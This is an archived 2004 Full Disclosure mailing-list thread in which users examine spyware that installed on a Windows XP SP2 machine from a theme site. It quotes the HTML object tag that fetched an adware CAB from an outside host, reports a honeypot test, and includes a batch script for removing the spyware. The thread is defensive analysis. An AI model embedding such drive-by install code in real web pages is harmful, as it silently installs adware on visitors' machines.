Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: Spyware installs ... XP SP2 box
From: "Geraldo Rivera" <iamafraud () hotmail com>
Date: Tue, 05 Oct 2004 19:30:05 -0400

Thanks to everybody for all the info posted here. I wish I had a machine available right now to set up a vanilla SP2 install so I could witness the results of visiting the site again myself.

I did indeed say that I have visited the site in the past. However, I hadn't in a number of months prior to this visit. I also did not discover any adware/spyware that was installed on my machine prior to 10/2 (nor did ad-aware, spybot, or pest-patrol). I trust in the info that has been posted here, I just wish that I could witness it myself. I am very cautious when surfing (I know somebody is going to tell me not cautious enough since I am still using IE) so I am wondering what could have been installed prior to this visit that allowed this install to happen without any interaction.

Regardless, thanks again to everybody for the good info, and a big fuck you to themexp.org.


From: "Castigliola, Angelo" <ACastigliola () unumprovident com>
To: "raize" <raize () gravito com>, <full-disclosure () lists netsys com>
Subject: RE: [Full-disclosure] Spyware installs ... XP SP2 box
Date: Tue, 5 Oct 2004 12:11:24 -0400

Thank you for the test Raize. I appreciate your time.

>One must assume that you are installing these "theme packs" via some
BHO (Browser Helper Object) that you
>installed previously or put the site on the "Always trust content from
this provider". Perhaps someone
>else can explain where I am missing the exploit, because a quick glance
over seems to indicate there is
>none for XP SP2. (I did not test this on SP1)

I think you are right. It seems the only person that was not prompted
for the install that was not running SP2 was the original author of this
thread who said that it was a previously visited site.

As far as users running SP1 there is no security warning that says an
executable is about to be installed. There is no Microsoft Update that
will prevent this from loading. Like most large organizations just
jumping to SP2 is not an option. It needs go though rigorous testing to
make sure it complies with all of our internal software.

Angelo Castigliola III
Operations Technical Analyst I
UnumProvident IT Services
207.575.3820
-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of raize
Sent: Tuesday, October 05, 2004 9:29 AM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Spyware installs ... XP SP2 box


The installed code is definitely:

<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0></object>

However, there is no exploit here. I loaded this with a default honeypot
image of XPSP2 with IE as an Admin and nothing else installed other than
the drop down that asked me if I really wanted to trust this site for
installing an executable.

One must assume that you are installing these "theme packs" via some BHO
(Browser Helper Object) that you installed previously or put the site on
the "Always trust content from this provider". Perhaps someone else can
explain where I am missing the exploit, because a quick glance over
seems to indicate there is none for XP SP2. (I did not test this on SP1)

Spybot and Ad-aware do not catch and kill WinRebates and WinAd
spy/adware properly, but I have a batch command that will do it for you.
Included is a .zip of each IP contacted along with full URL request and
output. It also contains the contents of this email and the batch file
with these commands: (You'll want to rename the .txt to .bat)

--------------------------------------------
cd "C:\Program Files\Winad Client"
taskkill /T /F /IM WinClt.exe
taskkill /T /F /IM WinAd.exe
erase WinClt.exe
erase WinAd.exe
cd ..
cd Web_Rebates
taskkill /T /F /IM WebRebates0.exe
taskkill /T /F /IM WebRebates1.exe
erase WebRebates0.exe
erase WebRebates1.exe
cd ..
rd /Q /S "Winad Client"
rd /Q /S "Web_Rebates"
cd "C:\Windows\system32"
taskkill /T /F /IM fjdria.exe
taskkill /T /F /IM ezSP_Px.exe
erase fjdria.exe
erase ezSP_Px.exe

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE! hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault